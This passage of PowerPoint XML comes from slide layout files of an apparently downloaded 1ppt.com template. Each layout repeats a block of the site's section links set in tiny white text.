              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout280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80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80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80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8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81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81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81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81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81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81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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout281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81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81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81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8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82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82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82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82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82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82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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout282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82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82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82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8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83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83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83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83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83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83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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
